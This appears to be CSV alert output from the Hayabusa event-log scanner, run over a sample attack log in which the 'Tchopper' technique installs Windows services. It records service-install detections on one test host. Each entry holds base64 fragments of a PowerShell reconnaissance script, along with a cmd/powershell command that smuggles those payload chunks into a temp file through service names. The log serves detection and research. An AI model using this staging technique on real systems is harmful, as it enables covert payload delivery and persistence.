2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
